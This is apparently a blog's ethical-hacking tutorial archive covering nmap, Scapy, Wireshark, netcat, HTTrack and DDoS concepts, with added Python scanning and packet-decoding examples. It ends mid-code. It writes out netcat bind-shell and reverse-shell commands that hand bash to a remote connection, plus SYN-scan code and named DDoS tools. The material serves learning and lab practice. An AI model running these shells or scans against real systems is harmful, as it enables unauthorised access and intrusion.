Archive for the ‘Ethical Hacking/Anti-Forensics’ Category

From the manual entry:

“Nmap (“Network Mapper”) is an open source tool for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. While Nmap is commonly used for security audits, many systems and network administrators find it useful for routine tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.”

Here are a few well-known TCP ports and the services conventionally assigned to them. Keep in mind that the service name nmap prints next to a port comes from this kind of table (its nmap-services file), not from the service itself; only version detection (-sV, below) actually talks to whatever is listening.

20 – FTP (File Transfer Protocol, data transfer)
21 – FTP (File Transfer Protocol, control)
22 – SSH (Secure Shell)
23 – Telnet
25 – SMTP (Simple Mail Transfer Protocol)
80 – HTTP (Hyper Text Transfer Protocol)
110 – POP3 (Post Office Protocol, version 3)
139 – NetBIOS Session Service
443 – HTTPS (HTTP over TLS/SSL)

Well, let's explore this tool...

  • nmap takes a host name or IP address as its argument. Use the help option to see all the options.
    #nmap --help or #nmap -h

  • Scan a single host (IPv4)
    Scan a host using the following command (run as root this is a SYN scan by default; as an unprivileged user nmap falls back to a TCP connect scan),
    #nmap host-name or #nmap host-ip
    For verbose output, use the -v option; for more verbose output, use -vv.

  • Scan multiple IP addresses
    Scan a range of IP addresses by giving a range inside an octet (for example 192.168.1.1-20), or scan the entire subnet using CIDR notation (for example 192.168.1.0/24), or use a wildcard,
    #nmap 192.168.1.*

  • Stealth Scan / Half Open Scan.
    This sends a SYN packet. If the port is open, the target answers with SYN/ACK; if it is closed, it answers with RST. Knowing that the port is open, nmap sends an RST instead of completing the handshake, so no full connection is ever established and the listening service's accept() never returns. "Stealth" is relative: the SYN probes are still visible to firewalls and intrusion detection systems, so this scan can still be detected. It needs raw socket privileges (root). Use the -sS option to do this scan.
    #nmap -sS host-ip

  • TCP Connect / Full Open Scan.
    A complete 3-way handshake is established through the operating system's connect() call. nmap sends a SYN packet; if the port is open, the target acknowledges with SYN/ACK, and nmap completes the connection with an ACK (and then closes it). This needs no special privileges, but every open port shows up as a completed connection in the target's application logs. Use the -sT option for this scan.
    #nmap -sT host-ip

  • Scan for UDP.
    To scan UDP ports use the -sU option (by default the 1000 most common UDP ports; add -p- for all 65535). UDP scanning is slow: a closed port answers with an ICMP port unreachable, while an open port usually answers with nothing at all, so nmap has to retransmit and wait before it can report a port as open|filtered.
    #nmap -sU host-ip

  • To know the versions of the services that are running (nmap connects to each open port and matches the responses against its probe database), use
    #nmap -sV host-ip

  • Or go for an aggressive scan with the -A option. It enables OS detection, version detection, the default script scan and traceroute, i.e. -O -sV -sC --traceroute together.
    #nmap -A host-ip
  • No ping. Skip host discovery and scan even if the host does not answer a ping (older releases spell this option -P0),
    #nmap -Pn host-ip
  • Fast scan. Scans only the 100 most common ports instead of the default 1000.
    #nmap -F host-ip

  • Specify port(s) to scan.
    You can specify the port you wish to know the status of. For instance, port 80,
    #nmap -p 80 host-ip
    Or you can scan for more than one port,
    #nmap -p 80,443 host-ip
    Or give a range,
    #nmap -p 20-100 host-ip
    (-p- scans all 65535 ports; without -p, nmap scans the 1000 most common ones.)

  • To see the host's interfaces and routes (useful to check which interface nmap will send from)
    #nmap --iflist

  • Detect the operating system (TCP/IP stack fingerprinting)
    Use the -O option (needs root, and nmap wants at least one open and one closed TCP port on the target for a reliable match),
    #nmap -O host-ip
    If this doesn't give a match, ask nmap to print its best guesses.
    #nmap -O --osscan-guess host-ip

  • Trace the packets nmap sends and receives (a good way to see what a scan actually looks like on the wire)
    #nmap --packet-trace host-ip
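To make the connect scan and nmap's target/port syntax concrete, here is a small scanner in Python. It is an added example, not nmap's code: parse_ports() and expand_targets() accept the "80,443,20-100", "192.168.1.1-20", "192.168.1.0/24" and "192.168.1.*" forms used above, probe() does the full three-way handshake through connect() exactly as -sT does, and demo_local_scan() checks it against one listening and one closed loopback port so it can run offline.

```python
"""Minimal TCP connect scanner (the idea behind nmap -sT) that understands the
nmap-style target and port specifications used above. Added example, not nmap's
own code; demo_local_scan() exercises it against loopback so it runs offline."""
import ipaddress
import socket
from concurrent.futures import ThreadPoolExecutor


def parse_ports(spec):
    """'80,443,20-100' -> sorted list of distinct port numbers."""
    ports = set()
    for part in spec.split(","):
        part = part.strip()
        if "-" in part:
            lo, hi = (int(x) for x in part.split("-", 1))
        else:
            lo = hi = int(part)
        if not 0 < lo <= hi <= 65535:
            raise ValueError("bad port spec: %s" % part)
        ports.update(range(lo, hi + 1))
    return sorted(ports)


def expand_targets(spec):
    """'10.0.0.5', '10.0.0.0/24', '10.0.0.1-20', '10.0.0.*' -> list of addresses.
    Like nmap, a CIDR block includes its network and broadcast addresses."""
    if "/" in spec:
        return [str(a) for a in ipaddress.ip_network(spec, strict=False)]
    octets = spec.split(".")
    if len(octets) != 4:
        raise ValueError("unsupported target spec: %s" % spec)
    ranges = []
    for o in octets:
        if o == "*":
            lo, hi = 0, 255
        elif "-" in o:
            lo, hi = (int(x) for x in o.split("-", 1))
        else:
            lo = hi = int(o)
        if not 0 <= lo <= hi <= 255:
            raise ValueError("bad octet: %s" % o)
        ranges.append(range(lo, hi + 1))
    return ["%d.%d.%d.%d" % (a, b, c, d)
            for a in ranges[0] for b in ranges[1] for c in ranges[2] for d in ranges[3]]


def probe(host, port, timeout=1.0):
    """Full three-way handshake via connect(); returns 'open', 'closed' or 'filtered'."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "open"                 # SYN -> SYN/ACK -> ACK completed; we then close
    except ConnectionRefusedError:
        return "closed"               # the target answered our SYN with RST
    except OSError:
        return "filtered"             # timeout or ICMP unreachable: something dropped it
    finally:
        s.close()


def connect_scan(host, ports, timeout=1.0, workers=64):
    """Scan the given ports of one host in parallel; returns {port: state}."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        states = list(pool.map(lambda p: probe(host, p, timeout), ports))
    return dict(zip(ports, states))


def open_ports(host, ports, timeout=1.0):
    return sorted(p for p, st in connect_scan(host, ports, timeout).items() if st == "open")


def demo_local_scan():
    """Offline self-check: one listening loopback port and one that is closed."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    listening = srv.getsockname()[1]
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind(("127.0.0.1", 0))        # grab a second free port ...
    closed = tmp.getsockname()[1]
    tmp.close()                       # ... and release it so nothing listens there
    try:
        return connect_scan("127.0.0.1", [listening, closed]), listening, closed
    finally:
        srv.close()


if __name__ == "__main__":
    import sys                        # usage: python scan.py 192.168.1.* 22,80,443
    for target in expand_targets(sys.argv[1]):
        found = open_ports(target, parse_ports(sys.argv[2]))
        if found:
            print(target, found)
```

Because every probe is a real connect(), the target's services see and log each open-port hit, which is precisely the trade-off between -sT and the half-open -sS scan described above.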

Scapy is a powerful packet manipulation tool, network scanner, packet generator, packet sniffer, etc. Scapy uses the Python interpreter as its console, so you can use any Python operation to design your packets. You can install Scapy by typing the following in your terminal (Ubuntu; on current releases the package is python3-scapy).

#apt-get install python-scapy

Start Scapy by running the following in your terminal once you are done with the installation (you should be root, since Scapy needs raw sockets to send and sniff; -s saves the session to a file so your variables survive a restart).

#scapy -s mysession

Vital commands to begin with:

ls() – Lists the supported protocol layers.

If a protocol layer is given as a parameter, it lists the fields of that layer together with their types and default values. Let's try the Internet Protocol layer,
>>> ls(IP)
And the result would be something like this...

lsc() – Lists Scapy's user commands. If a command is given as a parameter, its documentation is displayed.

conf – This object holds the configuration (default interface, routing table, verbosity and so on).

Fine, what are we waiting for? Let's go ahead and create our own packet. Let's create a TCP/IP packet (the addresses below are placeholders; put in your own source and destination).

>>> i=IP() #create IP packet
>>> i.dst="dst-ip" #destination = the target
>>> i.src="src-ip" #source = our address; any address can be set here, which is all spoofing is
>>> i.ttl=128 #time to live = 128
>>> i.show() #show the created packet
###[ IP ]###
version= 4
ihl= None
tos= 0x0
len= None
id= 1
frag= 0
ttl= 128
proto= ip
chksum= None
>>> t=TCP() #create TCP packet (defaults: sport=20, dport=80, flags=S)
>>> send(i/t) #send the packet; '/' stacks layers, here TCP as the payload of IP
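The IP()/TCP(flags="S") packet built above is exactly the probe of the half-open scan from the nmap post (nmap -sS). The following script, an added example that is neither part of this post nor of Scapy, sends one such SYN per port, reads the single reply with sr1(), maps it to nmap's open/closed/filtered states, and sends the RST that keeps the connection half-open. Sending needs Scapy installed and root for raw sockets; classify_response() is plain Python so the decision logic can be checked without either.

```python
"""Half-open (SYN) probe built from the Scapy layers above: the same exchange nmap -sS
performs, one port at a time. Added example, not part of the original post or of
Scapy. Sending needs Scapy installed and root for raw sockets; classify_response()
is pure Python so the decision logic can be checked without either."""
import random

try:
    from scapy.all import ICMP, IP, TCP, send, sr1
    HAVE_SCAPY = True
except ImportError:              # the classifier below still works without Scapy
    HAVE_SCAPY = False

FIN, SYN, RST, PSH, ACK = 0x01, 0x02, 0x04, 0x08, 0x10   # TCP flag bits


def classify_response(flags, icmp_unreachable=False):
    """Map what came back for one SYN onto nmap's port states.
    flags: integer TCP flag field of the reply, or None when nothing arrived."""
    if icmp_unreachable:
        return "filtered"        # ICMP type 3: a firewall refused to forward the probe
    if flags is None:
        return "filtered"        # silence: dropped on the way, or host down
    if flags & SYN and flags & ACK:
        return "open"            # SYN/ACK: a service is listening
    if flags & RST:
        return "closed"          # RST(/ACK): nothing listening on that port
    return "unknown"


def syn_probe(dst, dport, timeout=2):
    """Send one SYN, wait for one reply, and reset the half-open connection ourselves."""
    if not HAVE_SCAPY:
        raise RuntimeError("scapy is not installed")
    sport = random.randint(1025, 65535)
    probe = IP(dst=dst) / TCP(sport=sport, dport=dport, flags="S")
    reply = sr1(probe, timeout=timeout, verbose=0)
    if reply is None:
        return classify_response(None)
    if reply.haslayer(ICMP):
        return classify_response(None, icmp_unreachable=True)
    if not reply.haslayer(TCP):
        return "unknown"
    state = classify_response(int(reply[TCP].flags))
    if state == "open":
        # Tear down before anything further happens. The Linux kernel also RSTs SYN/ACKs
        # for connections it never opened, which is what keeps the scan "half-open"
        # even if this step is skipped; doing it explicitly mirrors what nmap does.
        send(IP(dst=dst) / TCP(sport=sport, dport=dport, flags="R", seq=reply[TCP].ack),
             verbose=0)
    return state


def syn_scan(dst, ports, timeout=2):
    """{port: state} for each port, e.g. syn_scan("dst-ip", [22, 80, 443])."""
    return {p: syn_probe(dst, p, timeout) for p in ports}
```

Run it with Wireshark open on the interface and you will see the three packets per open port (SYN, SYN/ACK, RST) and only two per closed port, which is the signature an IDS keys on when it flags a SYN scan.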

Now the packet is sent. But how do you confirm? Well, we know Wireshark! Go ahead and start Wireshark capturing on the interface the packet leaves from, and resend the packet to actually capture it. Here is what I captured,

Wireshark (originally named Ethereal) is a free and open source packet/network analyzer. It captures packets in real time and displays them in human-readable, decoded form. Wireshark provides a GUI; for a command line interface use TShark, which ships with it. Download Wireshark from the official website.

Once done with the installation, launch Wireshark. Capturing requires permission to open the interface: run it as root, or on Debian/Ubuntu let the package give dumpcap the capture capability and add your user to the wireshark group.

1. Capture/Sniff packets:

Choose an interface to capture the packets from. You can pick one from the interface list on the start page, or
select Capture->Interfaces

Choose an appropriate interface. I am using Wireshark inside my VirtualBox VM, so I will be choosing eth1 to capture the packets from. You can choose any interface. Once that is done, to start capturing your packets, hit Start or
select Capture->Start
At first it has no packets, so it will be blank.

Let's initiate a connection. I will request the info.php page (refer LAMP). So, let me open my browser and type in the URL. This gives me the info page like so,

Let's see the back-end now. Your Wireshark window will show the packets it captured during our HTTP request: the TCP handshake, the GET, the response and the ACKs that go with them.

By default, Wireshark displays packets in three panes. Starting from the top,

  • Packet List : Every captured packet is listed, one per line, with brief details: packet number, time, source IP, destination IP, the highest-level protocol Wireshark could decode, the length of the packet and an info summary. Wireshark uses colors so you can identify the type of traffic at a glance. In the default coloring rules HTTP is light green, plain TCP segments are light purple, UDP is light blue, and black marks TCP packets with problems (retransmissions, resets, zero windows and the like). View->Coloring Rules shows the full list.

  • Packet Details : The decoded headers of the selected packet, layer by layer: the frame, the Ethernet header, the IP header, the TCP/UDP header and, if Wireshark knows the protocol, the application data (here the HTTP request or response). Each layer can be expanded to show its individual fields.

  • Packet Bytes : This pane shows the entire contents of the captured frame, including the Layer 2 (OSI) header, in both hexadecimal and ASCII. Clicking a field in Packet Details highlights the bytes that field occupies.

2. Packet Analysis:

Filtering Packets:

When you are working on a specific packet type, or on packets from a particular IP and so on, filtering comes in handy. Say you want to inspect only HTTP packets: type http in the display filter bar. Filters can also select addresses and ports, e.g. ip.addr == host-ip or tcp.port == 80, and clauses can be combined with and/or. Note that a display filter only hides packets from view; a capture filter, set before starting the capture, decides what gets recorded at all. The result would be something like this...

Follow TCP Stream:

To view the complete conversation between the client and the server, right click on a particular packet and select Follow TCP Stream (in current versions Follow->TCP Stream). Wireshark reassembles the payloads of both directions of that connection and shows them as text, one color per direction, which is the easiest way to read an HTTP request and its response in full.
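What the three panes, the display filter and Follow TCP Stream actually do is header decoding, predicate matching and payload reassembly. The script below is an added example, not Wireshark's code, that does each of these in plain Python over a constructed capture (an HTTP request for info.php between two made-up VirtualBox host-only addresses, plus one unrelated SSH segment), so it runs offline; checksums are neither computed nor verified.

```python
"""A pure-Python miniature of what Wireshark does in its three panes, the display
filter and Follow TCP Stream: decode Ethernet/IPv4/TCP headers, filter packets, and
stitch one connection's payloads back together. Added example, not Wireshark's code.
The capture is constructed inline so everything runs offline; checksums are zeroed."""
import struct

ETH_IPV4 = 0x0800
PROTO_TCP = 6


def decode_frame(frame):
    """Packet Details in miniature: one dict of decoded fields with Wireshark-style names."""
    if len(frame) < 14:
        raise ValueError("truncated Ethernet frame")
    dst_mac, src_mac, ethertype = struct.unpack("!6s6sH", frame[:14])
    pkt = {"eth.src": src_mac.hex(":"), "eth.dst": dst_mac.hex(":"), "eth.type": ethertype}
    if ethertype != ETH_IPV4:
        return pkt
    ip = frame[14:]
    ver_ihl, _tos, total_len, _id, _frag, ttl, proto, _csum, src, dst = \
        struct.unpack("!BBHHHBBH4s4s", ip[:20])
    ihl = (ver_ihl & 0x0F) * 4
    pkt.update({"ip.src": ".".join(map(str, src)), "ip.dst": ".".join(map(str, dst)),
                "ip.proto": proto, "ip.ttl": ttl, "ip.len": total_len})
    if proto != PROTO_TCP:
        return pkt
    tcp = ip[ihl:total_len]
    sport, dport, seq, ack, off_flags = struct.unpack("!HHIIH", tcp[:14])
    data_off = (off_flags >> 12) * 4
    pkt.update({"tcp.srcport": sport, "tcp.dstport": dport, "tcp.seq": seq, "tcp.ack": ack,
                "tcp.flags": off_flags & 0x1FF, "tcp.payload": tcp[data_off:]})
    return pkt


def packet_list(frames):
    """Packet List pane: decoded packets numbered from 1, with the frame length."""
    rows = []
    for n, frame in enumerate(frames, 1):
        pkt = decode_frame(frame)
        pkt["frame.number"], pkt["frame.len"] = n, len(frame)
        rows.append(pkt)
    return rows


def matches(pkt, display_filter):
    """A small subset of the display-filter language: 'tcp', 'http',
    'ip.addr == A', 'tcp.port == N', joined with ' and '."""
    for clause in display_filter.split(" and "):
        clause = clause.strip()
        if clause == "tcp":
            ok = "tcp.srcport" in pkt
        elif clause == "http":       # Wireshark dissects port-80 segments carrying data as HTTP
            ok = 80 in (pkt.get("tcp.srcport"), pkt.get("tcp.dstport")) and bool(pkt.get("tcp.payload"))
        elif clause.startswith("ip.addr"):
            ok = clause.split("==", 1)[1].strip() in (pkt.get("ip.src"), pkt.get("ip.dst"))
        elif clause.startswith("tcp.port"):
            ok = int(clause.split("==", 1)[1]) in (pkt.get("tcp.srcport"), pkt.get("tcp.dstport"))
        else:
            raise ValueError("unsupported filter: " + clause)
        if not ok:
            return False
    return True


def follow_tcp_stream(packets, selected):
    """Both directions of the connection `selected` belongs to, in capture order, as
    (sender ip, payload) pairs; empty segments (handshake, bare ACKs) are skipped."""
    key = frozenset([(selected["ip.src"], selected["tcp.srcport"]),
                     (selected["ip.dst"], selected["tcp.dstport"])])
    stream = []
    for p in packets:
        if "tcp.srcport" in p and p["tcp.payload"] and \
           frozenset([(p["ip.src"], p["tcp.srcport"]), (p["ip.dst"], p["tcp.dstport"])]) == key:
            stream.append((p["ip.src"], p["tcp.payload"]))
    return stream


def build_frame(src, dst, sport, dport, flags, payload=b"", seq=0, ack=0):
    """Constructed traffic for the demo: Ethernet + IPv4 + TCP with zeroed checksums."""
    tcp = struct.pack("!HHIIHHHH", sport, dport, seq, ack, (5 << 12) | flags, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, PROTO_TCP, 0,
                     bytes(int(o) for o in src.split(".")), bytes(int(o) for o in dst.split(".")))
    return bytes.fromhex("08002761c3d1") + bytes.fromhex("0a0027000001") + struct.pack("!H", ETH_IPV4) + ip + tcp


CLIENT, SERVER = "192.168.56.1", "192.168.56.101"    # made-up host-only addresses
SAMPLE_FRAMES = [
    build_frame(CLIENT, SERVER, 51234, 80, 0x02),                            # SYN
    build_frame(SERVER, CLIENT, 80, 51234, 0x12),                            # SYN/ACK
    build_frame(CLIENT, SERVER, 51234, 80, 0x10),                            # ACK
    build_frame(CLIENT, SERVER, 51234, 80, 0x18, b"GET /info.php HTTP/1.1\r\nHost: 192.168.56.101\r\n\r\n"),
    build_frame(SERVER, CLIENT, 80, 51234, 0x18, b"HTTP/1.1 200 OK\r\nServer: Apache\r\n\r\n<html>phpinfo()</html>"),
    build_frame(CLIENT, SERVER, 40001, 22, 0x18, b"SSH-2.0-OpenSSH_6.0p1\r\n"),    # another stream
]
```

The "http" filter only matches frames 4 and 5 because, like Wireshark, it needs a payload to dissect; the handshake and bare ACKs stay hidden even though they belong to the same conversation, which is exactly what Follow TCP Stream reassembles for you.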




Netcat, the Swiss-Army knife of networking, is a simple utility that reads and writes data across network connections over TCP or UDP. Its functionality ranges from port scanning to backdoors!

Alright, let's have some fun with this tool.

1. Port Scanning:

We can use netcat for port scanning, to find the open ports on the target machine.

#nc -v target-ip 10-1000

Here target-ip is the target's IP and 10-1000 indicates the range to be scanned (add -z to only connect without sending any data; -v reports each result). Netcat does a full connect() for every port, so this is the equivalent of nmap -sT, only slower and noisier. In my case port 80 is open. That is the HTTP port.

2. Banner grabbing:

Let's go ahead and connect to the HTTP server. I am using Backtrack 5 r3 on the virtual machine, to connect to my local Ubuntu 12.10 machine running an Apache server. So, issue the following command,

#nc -v target-ip 80

Once connected, let's request something, say HEAD / HTTP/1.1, followed by a Host: target-ip line and then an empty line (HTTP/1.1 requires the Host header, and the empty line ends the request; press return twice).

We got the banner, and we got something in return! The Apache server is up! This is good. The status line and headers tell us what software is running, which is the starting point for looking up known weaknesses later. If you are lucky, the version of the Apache server is returned; whether it is depends on the server's ServerTokens setting, which is why hardened servers say nothing more than "Apache".
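The same banner grab, scripted, as an added example that is not part of the original post: head_request() sends the HEAD request exactly as typed above (with the Host header HTTP/1.1 requires), parse_banner() pulls the status line and the Server header out of the reply, and fake_apache_server() is a constructed loopback stand-in for the Apache box so the whole thing can be exercised offline; the banner string it returns is made up.

```python
"""HTTP banner grab, the way the nc + 'HEAD / HTTP/1.1' step above does it, with the
reply parsed for the Server header. Added example, not part of the original post.
fake_apache_server() is a constructed loopback stand-in for the Apache machine."""
import socket
import threading


def head_request(host, port=80, timeout=3.0):
    """Open a TCP connection, send a HEAD request and return the raw response bytes."""
    # HTTP/1.1 requires a Host header; the blank line ends the request.
    req = ("HEAD / HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n" % host).encode()
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(req)
        while True:                         # read until the server closes the connection
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def parse_banner(raw):
    """Split status line and headers; returns (status_line, headers, server)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1", "replace")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers, headers.get("server", "")   # '' when ServerTokens hides it


def grab(host, port=80):
    """Banner-grab one host:port; returns the Server header, '' if not disclosed."""
    return parse_banner(head_request(host, port))[2]


def fake_apache_server(banner):
    """Constructed loopback server answering any request with the given Server header.
    Returns the port it listens on; it serves exactly one client."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _peer = srv.accept()
        with conn:
            conn.recv(4096)                 # the HEAD request
            conn.sendall(b"HTTP/1.1 200 OK\r\nServer: " + banner +
                         b"\r\nContent-Type: text/html\r\n\r\n")
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]
```

Point grab() at a real host and port 80 and you get the same line the netcat session showed; compare it with the nmap -sV output for the same port, which probes deeper when the banner has been trimmed.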

3. How about a rudimentary chat using netcat? Let's do this!

Here one machine must be a listener. I made Ubuntu the listener.

#nc -lvp 4444

Meaning, listen verbosely on port 4444. (Some netcat builds, the OpenBSD one for instance, want the port as a plain argument instead: #nc -lv 4444.)

Now coming to Backtrack, let's get connected,

#nc -v target-ip 4444

Once you press the return key, the connection will be established.

But nothing much happens, right? Nothing happens until you start typing... Go ahead and type in your message... Each line you type is sent as-is, in clear text, to the other end, and you can have a complete rudimentary chat...

4. File transfer:

Not just chat, you can send almost any data using netcat... Alright, let's send a file then.

Let's send a file from Ubuntu to Backtrack.

In Ubuntu:

Create a file.

#touch /home/file

#echo "This is an example file" > /home/file

#cat /home/file

Let's listen on port 4444 and serve the file /home/file (the < operator feeds it to netcat as standard input)

#nc -lvp 4444 < /home/file

In Backtrack:

Let's receive the file.

#nc -v target-ip 4444 > /home/file

Once you hit the return key the transfer runs, but you won't get any message on successful transfer: netcat simply copies bytes until the connection closes. Depending on the build, the sender may keep the connection open after the file has been sent, so press Ctrl-C once the file has arrived (or start the sender with -q 1 where supported, which closes it one second after end of input). Netcat does no integrity check either, so compare checksums (md5sum or sha256sum on both sides) for anything that matters. But we know the file is right there. Let's check it out...

#ls /home/file

#cat /home/file
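Under the hood the chat and the file transfer are the same thing: one side listens, the other connects, and bytes are copied until the connection closes. The script below is an added example, not part of the original post, that does the file transfer with raw sockets in that shape (send_file() is the nc -lvp 4444 < file side, receive_file() the nc host 4444 > file side) and adds the two things netcat lacks: a clean end-of-file signal and a checksum comparison. demo_transfer() runs both ends on loopback with a constructed file.

```python
"""The netcat file transfer (and chat, which is the same loop with the keyboard as
input) done with raw sockets: one side listens, the other connects, and bytes are
copied until the connection closes. Added example, not part of the original post.
demo_transfer() runs both ends on loopback with a constructed file and verifies the
copy with a checksum, which netcat itself never does."""
import hashlib
import os
import socket
import tempfile
import threading


def send_file(path, port, host="0.0.0.0", ready=None):
    """Listener side (nc -lvp PORT < path): accept one client, stream the file, hang up."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(1)
        if ready is not None:
            ready.set()                           # tell the demo the port is live
        conn, _peer = srv.accept()
        with conn, open(path, "rb") as f:
            conn.sendfile(f)
            conn.shutdown(socket.SHUT_WR)         # EOF is the only "transfer complete" signal


def receive_file(host, port, path):
    """Client side (nc HOST PORT > path): read until EOF; returns bytes written."""
    total = 0
    with socket.create_connection((host, port)) as s, open(path, "wb") as f:
        while True:
            chunk = s.recv(65536)
            if not chunk:
                break
            f.write(chunk)
            total += len(chunk)
    return total


def sha256_of(path):
    """Checksum both sides should compare; netcat gives no integrity guarantee."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(65536), b""):
            h.update(block)
    return h.hexdigest()


def free_port():
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def demo_transfer():
    """Send a constructed 96 KiB file over loopback; returns (bytes received, checksums match)."""
    d = tempfile.mkdtemp()
    src, dst = os.path.join(d, "file"), os.path.join(d, "received")
    with open(src, "wb") as f:
        f.write(b"This is an example file\n" * 4096)
    port, ready = free_port(), threading.Event()
    sender = threading.Thread(target=send_file, args=(src, port, "127.0.0.1", ready), daemon=True)
    sender.start()
    ready.wait(5)
    received = receive_file("127.0.0.1", port, dst)
    sender.join(5)
    return received, sha256_of(src) == sha256_of(dst)
```

Everything still travels in clear text; anyone on the path can read or alter the file in transit, which is the gap Cryptcat and SBD (mentioned below) close with encryption.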

5. Bind/Reverse shell:

Let's get to the actual power of netcat.

->Binding a shell:

Ubuntu: Let's listen on port 4444 and, once a client connects, hand it our bash (-e /bin/bash; if you are experimenting with a Windows machine, bind the command prompt with -e cmd.exe). Note that -e exists only in some netcat builds (netcat-traditional, Ncat); the OpenBSD netcat deliberately leaves it out.

#nc -lvp 4444 -e /bin/bash

Backtrack: connect to it, and whatever you type is executed by bash on Ubuntu,

#nc -v target-ip 4444

->Reverse shell:

Here we reverse the direction: the target connects out to us and pushes its shell over the connection, which is how netcat is used as a backdoor. A reverse shell works even when the target sits behind NAT or a firewall that blocks inbound connections, which is why it is the more common choice in practice. Let's send the bash to a listening machine.

In Ubuntu:

Again, let's listen on port 4444

#nc -lvp 4444

In Backtrack:

Let's attach bash to the outgoing connection.

#nc -v target-ip 4444 -e /bin/bash

Once the connection is established, go ahead and play around with commands in Ubuntu... Either way the shell's input and output cross the network unencrypted, so anyone sniffing the link sees every command and every result (compare Cryptcat and SBD below).

I used a few commands and created a few files...

Here is the netcat cheat sheet!

Other alternatives: Ncat (from the nmap project; adds SSL, proxy support and access control), Socat, Cryptcat (netcat clone with Twofish encryption), SBD (Secure Backdoor, another netcat clone with encryption).

Here, check out my videos that demonstrate the above netcat explanation.

HTTrack is a free offline browser. It allows you to download a site to a local directory (make a page-by-page copy of the website). This lets us mine the target website offline. Download HTTrack.

Or install it using the command (on Debian/Ubuntu Linux):

$sudo apt-get install httrack

Invoke HTTrack in interactive mode by running it without arguments; it then prompts for each setting.

$httrack

Name your project. I named it example.

Enter the base path, the directory where your mirror must reside. I have given it as /home

Enter the URL/URLs of which you are creating the mirror(s).

Enter 1 to create the mirror web site(s). Along with this there are a number of other options; you can just explore.

You can use a proxy. I am not using any, but you might need one while doing a pen test on real websites.

Launch the mirror. Wait for it to complete. Keep in mind that mirroring fetches every page, so it is noisy: the target's access log will show thousands of requests from one address, by default with a User-Agent that names HTTrack (it is configurable).

Once done, a directory with the name you mentioned is created in the path you provided.

Let's check that.

#cd /home; ls

#cd example; ls

Here we go... A directory is created with the name of the URL provided. Change to that directory and check the files. This should give you the complete mirror of the website.

Distributed Denial of Service, abbreviated DDoS, is a type of DoS attack (an attack designed to render a computer or network incapable of providing normal service), where a large number of compromised systems are used against a targeted system with the intention of making the machine or its network resources/services unavailable to its users. The compromised systems form a botnet. The master controller commands these bots, and at a chosen time the bots all send a large number of requests for a resource/service, which slows the target down and may exhaust it completely.

There are lots of DDoS methods. I will be explaining SYN flood and Ping of Death.

SYN flood: It exploits the way the TCP three-way handshake allocates state. The attacker spoofs the source IP and floods the target with SYN packets. The victim acknowledges each SYN with a SYN-ACK to the client (the spoofed IP), but the spoofed address never responds with the final ACK, because it never started a handshake. The server keeps each half-open connection in its backlog for a fixed time waiting for that ACK; flooded with a large number of SYN packets, the backlog and memory saturate and legitimate connections are refused. The standard defence is SYN cookies, where the server encodes the connection state in its initial sequence number and allocates nothing until the ACK arrives (net.ipv4.tcp_syncookies on Linux).

Ping of Death (PoD): It is all about reassembly! The attacker crafts a ping larger than a normal one, and many older systems did not like being pinged with a packet greater than 65535 bytes (the maximum IPv4 packet size). A packet of that size has to be fragmented to be sent, and each fragment on its own is legal; but when the target reassembles them, the last fragment's offset plus its length exceeds the 65535-byte reassembly buffer, causing a buffer overflow that often crashes the system. Modern operating systems check the total length before reassembling, so the classic attack no longer works against them.

A few popular pieces of software to perform DDoS attacks:

TFN2K (Tribe Flood Network), written by Mixter. Methods: ICMP flood, SYN flood, UDP flood and Smurf attack.

Trinoo or trin00 is a DDoS tool. Methods: UDP flood. It is famous for allowing the attackers to leave a message in a folder called cry_baby.

Stacheldraht, written by Random for Linux and Solaris systems. Methods: ICMP flood, UDP flood, TCP SYN flood and Smurf attack. Stacheldraht combines features of Trinoo with TFN and adds encrypted communication between attacker and handlers.

Another such tool, used by the hacktivist collective Anonymous to carry out DDoS attacks, is the Low Orbit Ion Cannon (LOIC), where participants (anons) joined voluntary botnets to attack websites, from those of the Church of Scientology (Project Chanology) to the targets of Operation Payback. LOIC is an open source project and the source code is available on GitHub.
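Two checks that follow directly from the two attacks described above, as an added example that is not part of the original post: the first spots a SYN flood in netstat -ant output by counting half-open (SYN_RECV) connections per local port and how many distinct sources they come from (a flood from spoofed addresses shows many sources that never progress to ESTABLISHED); the second is the Ping of Death arithmetic, whether a fragment's offset plus its length pushes the reassembled datagram past the 65535-byte IPv4 limit. The netstat excerpt is constructed.

```python
"""(1) SYN-flood indicator from 'netstat -ant' output: half-open connections per local
port and the number of distinct sources behind them. (2) Ping of Death arithmetic:
would reassembling this fragment exceed the 65535-byte IPv4 maximum?
Added example, not from the original post; SAMPLE_NETSTAT is constructed."""
from collections import Counter, defaultdict

# Constructed netstat -ant excerpt: a web server under a spoofed-source SYN flood
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
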